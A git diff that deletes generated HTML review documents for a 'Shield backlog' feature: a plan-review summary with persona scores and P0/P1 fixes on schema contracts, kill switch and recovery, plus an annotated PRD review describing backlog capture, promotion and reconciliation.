-</li>
-<li><strong>AC:</strong> eager prune removes the referenced entry at end of run; lazy sweep removes plan-committed entries; second pass is a no-op (idempotent); shared engine; <strong><code>backlog.auto_reconcile=false</code> (now schema-valid) disables both</strong>; <strong>an end-of-run prune appends to <code>.shield/backlog-removed.log</code> before the remove; replaying the log restores the entry</strong>; debug latency line reports view+sweep wall time.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#high-level-design">TRD §7 High-Level Design</a> · LLD <a href="../../../lld-reconciler.md#concurrency-and-state"><code>reconciler</code> §8 Concurrency &amp; state</a></li>
-</ul>
-<hr />
-<h2 id="epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  <em>(M3)</em></h2>
-<h3 id="epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) <em>(high)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays via epic-name collision, malformed-stays, <strong>re-planned-epic-reorder-still-resolves</strong>, <strong>manifest-from-real-schema</strong>); evals for each behavior incl. duplicate-id rejection.
-<ul>
-<li><strong>[P1-1 — fix]</strong> Concurrency eval asserts <strong>detection</strong>: a concurrent on-disk change between read and replace is refused (<code>BacklogInvalid</code>), no lost entry — not a race the design forbids.</li>
-<li><strong>[P1 (security P1-b) — fix]</strong> Write-side eval: <code>capture()</code> producing a schema-invalid doc raises <code>BacklogInvalid</code> and leaves backlog.json byte-unchanged (no <code>.tmp</code> promoted).</li>
-<li><strong>[P1 (security P1-c) — fix]</strong> Recovery-rehearsal eval asserts recoverability across a crash at the ordering seam (after log-append/before remove).</li>
-<li>no-stamping eval (F6): plan.json + story records byte-unchanged after promotion.</li>
-<li><strong>[P1 / DX P1 — fix]</strong> Name the concrete CI entrypoint (the actual workflow file + runner under <code>shield/evals/</code> or <code>.github/workflows/</code>), not a task; path-filter glob <code>shield/{schema,scripts,skills/general/backlog}/**</code>, <code>shield/commands/backlog.md</code>.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> suite covers all listed behaviors (incl. compare-before-replace detection, write-side refusal, ordering-seam recovery, re-plan epic-reorder); self-contained (no API/LLM); PR body has RED + GREEN; named CI runner runs on the glob.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#milestones">TRD §10 Milestones</a></li>
-</ul>
-<h3 id="epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs <em>(medium)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> bump <code>marketplace.json</code> + <code>backlog_store</code> <code>pyproject.toml</code> (now <strong>unconditional</strong> per P1-4); finalize command/skill docs (capture, three triggers, kill switch, match key, manual remove, badges, <strong>wrong-removal recovery procedure</strong>); commit the <code>shield.schema.json</code> <code>backlog</code> change (P0-3); document a <strong>fixed</strong> audit interval + numeric trigger (PRD §7 thresholds); explicit DoD lines; CHANGELOG.
-<ul>
-<li><strong>[P2 — PM]</strong> Add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); add coarse effort/impact per milestone (PM4); quantify the v1-audit target (PM10).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> version bumped in same commit (incl. schema change); SKILL.md documents capture/view/promote/remove + 3 triggers + kill switch + audit cadence + recovery procedure; explicit DoD lines present; CHANGELOG mentions the feature.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#references">TRD §13 References</a></li>
-</ul>
-<hr />
-<h2 id="carried-forward--validate-the-bet">Carried forward + validate-the-bet</h2>
-<ul>
-<li>The prior PRD-review carry-forwards (capture interface, schema_version, drift tolerance, idempotency) remain folded (EPIC-1-S1/S2, EPIC-3-S2/S3).</li>
-<li>PM10 decision unchanged: ship M1, validate the bet from <code>backlog.json</code>'s 30-day git history before investing in M2/M3.</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li>Fold the 3 P0s (+ the P1s) in one editing pass on TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S2/S3, EPIC-1-S1/S2, EPIC-4-S1/S2. No story restructuring needed.</li>
-<li>Re-run <code>/plan-review</code> to confirm the P0s clear, then <code>/pm-sync</code> and <code>/implement</code> from M1.</li>
-</ul>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
deleted file mode 100644
index d955a64a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html
+++ /dev/null
@@ -1,206 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict-ready--composite-349-b--3-p0--8-p1-since-applied--see-resolution-above">Verdict: Ready — composite 3.49 (B+) ⚠️ (3 P0 + 8 P1 since applied — see Resolution above)</a>
-</li>
-<li><a href="#scorecard">Scorecard</a>
-</li>
-<li><a href="#deterministic-gates-run-before-dispatch">Deterministic gates (run before dispatch)</a>
-</li>
-<li><a href="#p0--blockers-fix-before-implement">P0 — Blockers (fix before /implement)</a>
-</li>
-<li><a href="#p1--should-fix-for-plan-quality">P1 — Should fix for plan quality</a>
-</li>
-<li><a href="#p2--nice-to-have">P2 — Nice to have</a>
-</li>
-<li><a href="#detailed-agent-findings">Detailed agent findings</a>
-</li>
-<li><a href="#recommendation">Recommendation</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-review--shield-backlog-backlog-20260527">Plan Review — Shield Backlog (<code>backlog-20260527</code>)</h1>
-<p><strong>Date:</strong> 2026-05-29 · <strong>Run:</strong> 1 · <strong>Source PRD:</strong> prd.md (type: lean) · <strong>Plan:</strong> plan.md + trd.md + plan.json (schema 1.5)
-<strong>Reviewers:</strong> dx-engineer, agile-coach, backend-engineer, sre, security-engineer, product-manager (PM1–PM10)</p>
-<blockquote>
-<p><strong>✅ Resolution (applied 2026-05-29):</strong> the user chose &quot;Apply P0+P1 to the plan.&quot; All <strong>3 P0</strong> and <strong>8 P1</strong> findings have been folded into the canonical artifacts (plan.json, trd.md, the 3 LLD drafts) and <code>shield/schemas/shield.schema.json</code> (additive <code>backlog</code> object). Re-validation: <code>validate_plan.py</code> ✅, <code>validate_trd.py</code> ✅ (milestone-drift clean), kill-switch <code>.shield.json</code> validates ✅, all 3 LLD drafts structurally ✅. The plan is now clear for <code>/implement</code>. See <code>plan.json</code> <code>metadata.plan_review_2026_05_29.{p0_applied,p1_applied}</code> for the per-finding trace. The findings below are retained as the review record.</p>
-</blockquote>
-<h2 id="verdict-ready--composite-349-b--3-p0--8-p1-since-applied--see-resolution-above">Verdict: <strong>Ready — composite 3.49 (B+)</strong> ⚠️ <em>(3 P0 + 8 P1 since applied — see Resolution above)</em></h2>
-<p>The re-plan is a clear improvement on the prior run (3.14 → 3.49): the deferred TRD landed, schema is 1.5, and the prior P0 (gate-0d duplication) + the SRE/Security P1 set are verifiably folded in. <strong>However</strong>, the backend reviewer — checking the design against the <em>live</em> Shield schemas rather than only against itself — surfaced <strong>3 P0 contract defects</strong> that each break a core path at implementation time. The weighted composite lands in &quot;Ready&quot; range, but the P0s gate <code>/implement</code>. All three are localized contract-pinning fixes, not design rework.</p>
-<h2 id="scorecard">Scorecard</h2>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Weight</th>
-<th>Grade</th>
-<th>Numeric</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX Engineer</td>
-<td>1.0</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td>1.0</td>
-<td>B−</td>
-<td>2.7</td>
-</tr>
-<tr>
-<td>Security Engineer</td>
-<td>1.0</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>Agile Coach</td>
-<td>0.7</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>SRE / Operations</td>
-<td>0.7</td>
-<td>A−</td>
-<td>3.7</td>
-</tr>
-<tr>
-<td>Product Manager (PM1–PM10 avg)</td>
-<td>0.7</td>
-<td>A</td>
-<td>3.6</td>
-</tr>
-<tr>
-<td><strong>Composite</strong></td>
-<td></td>
-<td><strong>B+</strong></td>
-<td><strong>3.49 → Ready</strong></td>
-</tr>
-</tbody>
-</table>
-<p>PM dim grades: PM1 A · PM2 A · PM3 A · PM4 B · PM5 B · PM6 B · PM7 A · PM8 A · PM9 A · PM10 B → avg 3.6.</p>
-<h2 id="deterministic-gates-run-before-dispatch">Deterministic gates (run before dispatch)</h2>
-<table>
-<thead>
-<tr>
-<th>Gate</th>
-<th>Result</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>0a schema (<code>validate_plan.py</code>)</td>
-<td>✅ exit 0</td>
-</tr>
-<tr>
-<td>0b TRD sections (<code>validate_trd.py</code>)</td>
-<td>✅ exit 0 (incl. milestone-drift)</td>
-</tr>
-<tr>
-<td>0c stale anchors</td>
-<td>✅ none</td>
-</tr>
-<tr>
-<td>0d PRD↔TRD duplication (§2/§5)</td>
-<td>✅ 6-char / 3-char overlap (≤80) — prior P0 resolved</td>
-</tr>
-<tr>
-<td>0e impl-manual (§7 fence &gt;20 lines)</td>
-<td>⚠️ §7 ASCII diagram is 27 lines, but §8 has 5 populated alternatives → escape satisfied (not P0)</td>
-</tr>
-<tr>
-<td>0f touches_lld_drift</td>
-<td>✅</td>
-</tr>
-<tr>
-<td>0g lld_components_integrity</td>
-<td>✅</td>
-</tr>
-<tr>
-<td>0h undocumented_lld</td>
-<td>n/a — no canonical <code>docs/lld/</code> (all net-new)</td>
-</tr>
-<tr>
-<td>0i lld_draft_review (3 drafts)</td>
-<td>✅ all 14 always-on + 8 forced subsections present, no vague TBDs</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p0--blockers-fix-before-implement">P0 — Blockers (fix before <code>/implement</code>)</h2>
-<p>All three independently verified against live schemas (<code>shield/schemas/{shield,plan}.schema.json</code>, <code>docs/shield/manifest.json</code>).</p>
-<ol>
-<li><strong>Reconciler/suggester contracts don't match the real <code>manifest.json</code>/<code>plan.json</code> shapes</strong> <em>(backend P0-1)</em>. <code>manifest.json</code> is <code>{schema_version, features:[{name, artifacts:{…plan_json: bool…}, reviews, updated}]}</code> — a list keyed by <code>name</code>, with a boolean <code>plan_json</code> flag and <strong>no stored plan path</strong>. <code>reconcile(entry, *, manifest, plans)</code> (lld-reconciler §5) never defines <code>plans</code> and never says the path must be <em>derived</em>. <strong>Fix:</strong> pin the real shapes; define <code>plans: dict[slug→plan]</code> populated by reading <code>docs/shield/&lt;feature&gt;/plan.json</code> for each feature with <code>artifacts.plan_json == true</code>; add a fixture from the actual manifest schema. <em>(Also covers DX P1 manifest read-contract.)</em></li>
-<li><strong>Existing-epic matching keys off a positional slot, not an identity</strong> <em>(backend P0-2)</em>. Epic ids are <code>EPIC-N</code> slugs assigned by <code>/plan</code> (<code>EPIC-2</code> = different epics in different plans, verified). After any re-<code>/plan</code>, an existing-epic entry stamped <code>EPIC-2</code> matches the wrong epic or rots. <strong>Fix:</strong> match existing epics by normalized <code>name</code> too (same predicate as proposed-new); treat <code>EPIC-N</code> only as a within-one-plan disambiguator; add a &quot;epic reordered across a re-plan&quot; eval.</li>
-<li><strong>Kill switch <code>backlog.auto_reconcile</code> is unshippable under the current <code>.shield.json</code> schema</strong> <em>(backend P0-3)</em>. <code>shield.schema.json</code> has <code>additionalProperties: false</code> and no <code>backlog</code> key; adding the flag fails validation, and no story includes the schema change. <strong>Fix:</strong> add a task+AC (EPIC-3-S3, version-bump in EPIC-4-S2) extending <code>shield.schema.json</code> with an optional <code>backlog</code> object (<code>{auto_reconcile: bool, default true}</code>) + config example. Without it the documented first-line rollback (TRD §14) cannot ship.</li>
-</ol>
-<h2 id="p1--should-fix-for-plan-quality">P1 — Should fix for plan quality</h2>
-<ol>
-<li><strong>Resolve the EPIC-3-S3 N4 recovery OR</strong> <em>(agile AC7 + sre P1-1)</em>. AC5 encodes &quot;commit-before-prune <strong>or</strong> removed-log&quot; — not writable as one test, and the §14 runbook can't be precise. Pick one v1 default (<strong>recommend <code>.shield/backlog-removed.log</code></strong> — avoids forcing a possibly-dirty-tree commit on every prune, decouples recovery from git state mid-<code>/implement</code>); make the other a non-goal.</li>
-<li><strong>Add lost-update detection (compare-before-replace)</strong> <em>(backend P1-1 + security P1-a)</em>. The concurrency eval tests a race the single-writer design forbids, and N5, if silently violated, yields a silent lost update. Have <code>capture()</code>/<code>remove()</code> carry the schema_version+entry-count (or mtime/hash) read at start and refuse <code>os.replace()</code> if the file changed underneath — a loud <code>BacklogInvalid</code> instead of a lost entry, <strong>no lockfile</strong>. Then the eval tests a real, detectable behavior.</li>
-<li><strong>Reword &quot;schema rejects duplicate id&quot; → validator</strong> <em>(backend P1-2)</em>. JSON Schema 2020-12 can't express property-level array uniqueness; F2 + EPIC-1-S1 AC must say <code>validate_backlog.py</code> enforces it (<code>duplicate_entry_id</code>).</li>
-<li><strong>Pin the feature <code>name</code> == folder-slug invariant</strong> <em>(backend P1-3)</em>. <code>suggest_feature</code> returns manifest <code>features[].name</code>, but the reconciliation key is the folder slug; if they differ, suggestion proposes an unresolvable value. Document the invariant + add a &quot;suggested value resolves to an existing <code>docs/shield/&lt;value&gt;/</code>&quot; fixture.</li>
-<li><strong>Resolve the packaging model</strong> <em>(backend P1-4)</em>. F3 (&quot;every capturing skill builds against this signature&quot;) implies an importable module; EPIC-4-S2 hedges. Decide at plan time — package <code>backlog_store</code> with a <code>pyproject.toml</code> so the version bump is unconditional; document the import path skills use.</li>
-<li><strong>Resolve the CI entrypoint to a concrete value</strong> <em>(dx P1)</em>. EPIC-4-S1 still phrases the runner as a task; name the actual workflow file + runner so the eval-gate AC is verifiable.</li>
-<li><strong>Add a write-side validation eval</strong> <em>(security P1-b)</em>. &quot;validate-or-refuse on read/<strong>write</strong>&quot; is asserted but only read-side + crash-mid-write are tested. Add: <code>capture()</code> producing a schema-invalid doc raises <code>BacklogInvalid</code> and leaves backlog.json byte-unchanged.</li>
-<li><strong>Test the recovery ordering seam</strong> <em>(security P1-c)</em>. Strengthen the recovery-rehearsal eval to assert recoverability across a crash <em>between</em> log-append and remove (and between remove and commit), not just after a clean wrong-removal.</li>
-</ol>
-<h2 id="p2--nice-to-have">P2 — Nice to have</h2>
-<ul>
-<li><strong>DX:</strong> fixed audit interval + numeric trigger (not &quot;e.g. monthly&quot;); state runtime prereqs (Python/uv, pydantic+jsonschema) once in SKILL.md; label the 3.12 (PRD-review) vs 3.14 (plan-review) composites inline.</li>
-<li><strong>Agile:</strong> consider splitting EPIC-3-S3 into S3a (triggers) + S3b (kill switch + recovery + latency); note EPIC-2 deliberately straddles M1/M2; state the N2 WARN threshold (&quot;&gt;1s&quot;).</li>
-<li><strong>SRE:</strong> drop &quot;independently&quot; from the kill-switch description (it's one coupled boolean); add a &quot;N entries removed since last view&quot; notice so wrong-removals aren't pull-only; define the removed-log lifecycle (tracked vs gitignored, rotation); require the wrong-removal recovery procedure in SKILL.md; specify no-op-prune logging.</li>
-<li><strong>Backend:</strong> add <code>os.fsync()</code> + a unique <code>.tmp</code> suffix; consider <code>read() -&gt; BacklogDoc</code> (pydantic) over raw dict; define the <code>RemovalDecision</code> dataclass (the F9 log fields).</li>
-<li><strong>Security:</strong> give <code>.shield/backlog-removed.log</code> a schema/parser + tracked-status decision; make dry-run/fixture mode provably non-destructive (force sweep off) + eval it; add a forward note that a future <code>migrate()</code> must be validate-or-refuse.</li>
-<li><strong>PM:</strong> add coarse effort/impact per milestone (PM4); add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); quantify the operational cost the tool recovers as a falsifiable v1-audit target (PM10).</li>
-</ul>
-<h2 id="detailed-agent-findings">Detailed agent findings</h2>
-<ul>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/backend-engineer.md">Backend Engineer</a> — B− (the 3 P0s + 4 P1s)</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/dx-engineer.md">DX Engineer</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/security-engineer.md">Security Engineer</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/agile-coach.md">Agile Coach</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/sre.md">SRE / Operations</a> — A−</li>
-<li><a href="../../../../reviews/plan/2026-05-29/detailed/product-manager.md">Product Manager (PM1–PM10)</a> — A</li>
-</ul>
-<h2 id="recommendation">Recommendation</h2>
-<p>The plan is <strong>Ready in substance</strong> — strong scope discipline, testable ACs, an acyclic milestone DAG, clean trust boundaries, and an honest threat model. But do <strong>not</strong> start <code>/implement</code> until the <strong>3 P0 contract fixes</strong> land: they are the difference between a plan that reads consistently and one whose reconciler, epic-matching, and kill switch actually work against the real Shield artifacts. The P1s (recovery-mechanism choice, lost-update detection, packaging) are best folded in the same revision pass. Estimated effort: one focused editing pass on the TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S3, and EPIC-4-S1/S2 — no story restructuring required.</p>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
deleted file mode 100644
index d2253360..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
+++ /dev/null
@@ -1,316 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield PRD Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield PRD Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/prd/2026-05-27/</code>)</div>
-<h1 id="shield-backlog">Shield Backlog</h1>
-<!-- [PRD-Review enhanced copy — 2026-05-27. Annotations are HTML comments tagged [P0]/[P1]/[P2] with persona attribution. Source content is unchanged; only comments were added. Verdict: Needs Work (composite 2.7, blocked by 1 P0). -->
-<h2 id="1-header">1. Header</h2>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-<tr>
-<td>PRD type</td>
-<td>Lean</td>
-</tr>
-<tr>
-<td>Date created</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Last updated</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Linked design spec</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Linked research</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Decision-maker</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Sign-off contacts</td>
-<td><em>(n/a for internal tooling)</em></td>
-</tr>
-<tr>
-<td>Linked plans</td>
-<td><em>(auto-populated by /plan)</em></td>
-</tr>
-</tbody>
-</table>
-<!-- [P2 from: PM] 7c — Sign-off N/A names no confirmer. Phrase as: "N/A — internal tooling, no Legal/Security/Support surface (confirmed by @ashwinimanoj)". -->
-<h2 id="2-terminologies">2. Terminologies</h2>
-<table>
-<thead>
-<tr>
-<th>Term</th>
-<th>Definition</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Backlog</td>
-<td>A project-level, ordered list of future work captured across the Shield workflow. Lives at <code>docs/shield/backlog.json</code>.</td>
-</tr>
-<tr>
-<td>Backlog entry</td>
-<td>One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong> (either may be proposed-new until promotion).</td>
-</tr>
-<tr>
-<td>Feature association</td>
-<td>The feature an entry belongs to (a <code>docs/shield/&lt;feature&gt;/</code> folder). It is the <strong>reconciliation key</strong>: <code>manifest.json</code> is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.</td>
-</tr>
-<tr>
-<td>Epic association</td>
-<td>The epic an entry slots into when planned — an existing epic id (e.g. <code>EPIC-2</code>) or a proposed new epic. Acts as the <strong>gate</strong> at reconciliation: the entry is removed only when this epic's work appears in the feature's <code>plan.json</code>.</td>
-</tr>
-<tr>
-<td>Promotion</td>
-<td>Acting on a backlog entry by starting the appropriate Shield step for it — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. <strong>The user decides which step</strong>; the backlog does not auto-route.</td>
-</tr>
-<tr>
-<td>Reconciliation</td>
-<td>Keeping the backlog current: <code>manifest.json</code> locates the entry's feature and whether it has a <code>plan.json</code>; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's <code>plan.json</code> (<code>epics[].stories[]</code>). No ids are stamped — matching is by feature (manifest) + epic (plan). A <code>prd</code>-only feature does <strong>not</strong> trigger removal.</td>
-</tr>
-<tr>
-<td>Agent-discovered entry</td>
-<td>A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: DX] Reconciliation match key UNSPECIFIED: with ids removed, define how a proposed-new epic name maps to the eventual real epic in plan.json — exact string match, or user-confirmed binding at promotion time? This is the removal-correctness heart; resolve before /plan. -->
-<!-- [P1 from: DX] `kind` field: §6/M1 commit to epic/story/task granularity and "schema defined", but the backing field is left open in §9. Decide it before M1. -->
-<h2 id="3-problem--context">3. Problem &amp; context</h2>
-<p>Future work surfaces constantly while using Shield — during <code>/research</code>, while writing a PRD, mid-<code>/plan</code>, and especially during <code>/implement</code> (&quot;we should also handle X later&quot;, &quot;this whole area needs a rewrite&quot;). Today there is <strong>nowhere to park that work</strong>. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.</p>
-<!-- [P1 from: PM] 1d — These quoted phrases are illustrative, not cited user-research artifacts. Cite a real transcript/session log, or link the (currently null) research doc. -->
-<p>Concretely:</p>
-<ul>
-<li>There is no project-level, ordered place to capture &quot;not now, but later&quot; items. <code>plan.json</code> only holds work already committed to a milestone; <code>manifest.json</code> is an artifact index. Neither captures un-triaged future work.</li>
-<li>Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.</li>
-<li>When future work <em>is</em> remembered, there's no consistent path from &quot;loose idea&quot; to &quot;stories in a plan.&quot; Each pickup re-derives the epic, the feature, and the scope from scratch.</li>
-</ul>
-<!-- [P1 from: PM] 1b — No baseline numbers. Add one concrete figure, e.g. "~N follow-up items surfaced and lost across the last M /implement runs", to size the problem. -->
-<p>Why now: Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) is mature, but it only handles work that's <em>already</em> been decided on. The gap is the staging area <em>before</em> that pipeline — where future work waits, ordered, until the user promotes it in.</p>
-<!-- [P1 from: PM] 11a/11b — Why-now describes a standing capability gap, not a concrete trigger; cost-of-inaction is unquantified. Anchor to a recent specific instance of lost follow-up work, and quantify (items dropped per cycle, or hours re-deriving scope). -->
-<h2 id="4-target-users--personas">4. Target users / personas</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Persona</th>
-<th>Goals</th>
-<th>Frictions today</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>Developer/PM driving Shield</td>
-<td>Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next</td>
-<td>Future ideas get lost or derail the current task; no ordered &quot;later&quot; list at the project level</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>The agent (Claude) running a Shield task</td>
-<td>Record follow-up work it discovers mid-task so the human doesn't have to remember it</td>
-<td>Discovered work is mentioned once in chat then forgotten; no place to persist it</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: PM] 1a — Personas are role categories, not a named persona. Name P1 concretely (e.g. "Ashwini, Shield maintainer running /implement daily"). -->
-<h2 id="5-architecture--flows">5. Architecture &amp; flows</h2>
-<p>A single global store <code>docs/shield/backlog.json</code> (sibling to <code>manifest.json</code>), a <code>/backlog</code> command to view it, a capture path usable from any Shield skill or by the user, and a <strong>user-driven promotion</strong>: the user picks an entry and starts whichever Shield step fits — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. Each entry carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong>. <strong>Reconciliation</strong> reads <code>manifest.json</code> as the project-level index — to find each entry's feature, see whether it has a <code>plan.json</code>, and surface its pipeline status (research/prd/plan) in the <code>/backlog</code> view — then opens the flagged <code>plan.json</code> and removes any entry whose epic's work now appears there. A <code>prd</code>-only feature stays in the backlog; only plan-committed work is removed. No ids are tracked.</p>
-<!-- [P1 from: DX] Capture-from-skill interface is undefined — M1 requires capture "usable from any Shield skill" but no command/helper/write-contract is given. Specify the capture entrypoint. -->
-<!-- [INFO from: Tech-lead] NFR notes to fold into /plan: (1) atomic write for backlog.json (temp-then-rename) + concurrent capture-vs-reconcile is the primary failure case; (2) add schema_version for forward migration; (3) reconciliation no-ops (never removes) on missing/old manifest.json or plan.json rather than erroring; (4) backlog.json is git-tracked, so bad removals are git-revertable — consider dry-run/confirm before reconcile removals. -->
-<pre class="mermaid">flowchart LR
-  cap[&quot;Capture&lt;br/&gt;(user or agent, anytime)&quot;] --&gt; bl[&quot;backlog.json&lt;br/&gt;(ordered, project-level)&quot;]
-  bl --&gt; view[&quot;/backlog&lt;br/&gt;(ordered list +&lt;br/&gt;per-entry pipeline status)&quot;]
-  man[&quot;manifest.json&lt;br/&gt;(feature index:&lt;br/&gt;research/prd/plan)&quot;] --&gt; view
-  bl --&gt; dec{&quot;User decides&lt;br/&gt;next step&quot;}
-  dec --&gt; research[&quot;/research&quot;]
-  dec --&gt; prd[&quot;/prd&quot;]
-  dec --&gt; plan[&quot;/plan&quot;]
-  dec --&gt; impl[&quot;/implement&quot;]
-  man --&gt; rec[&quot;Reconcile:&lt;br/&gt;epic&#x27;s work in feature&#x27;s plan.json&lt;br/&gt;→ remove from backlog&quot;]
-  plan --&gt; rec
-  rec --&gt; bl
-</pre>
-<h2 id="6-goals--non-goals">6. Goals &amp; non-goals</h2>
-<h3 id="goals">Goals</h3>
-<ul>
-<li>Capture future work (epic / story / task granularity) at <strong>any point</strong> in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.</li>
-<li>Support <strong>both</strong> capture sources: user-created and agent-discovered.</li>
-<li>Keep the backlog <strong>ordered</strong> so there's a clear &quot;what to pick up next.&quot;</li>
-<li>Every entry is <strong>associated with a feature and an epic</strong> — existing or proposed-new — and the agent <strong>suggests a matching feature/epic</strong> at capture or promotion time.</li>
-<li>A <code>/backlog</code> command <strong>shows the current backlog</strong>, ordered, with each entry's feature + epic association, source, and <strong>pipeline status (research / prd / plan, read from <code>manifest.json</code>)</strong> — so you can see what's been started (e.g. a prd written) without the entry being removed.</li>
-<li>Provide a <strong>user-driven promotion path</strong>: the user picks an entry and starts the Shield step they judge appropriate (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>). The backlog suggests, but does not dictate, the next step.</li>
-<li><strong>Keep the backlog current</strong>: when an entry's work appears in a feature's <code>plan.json</code>, the entry is removed automatically, so the backlog reflects only not-yet-planned work.</li>
-</ul>
-<!-- [P2 from: DX] "removed automatically" contradicts the on-/backlog-view reconciliation described in §2/§5/§9 and the §6 non-goal disclaiming automatic surfacing machinery. Replace with "removed on next /backlog view". -->
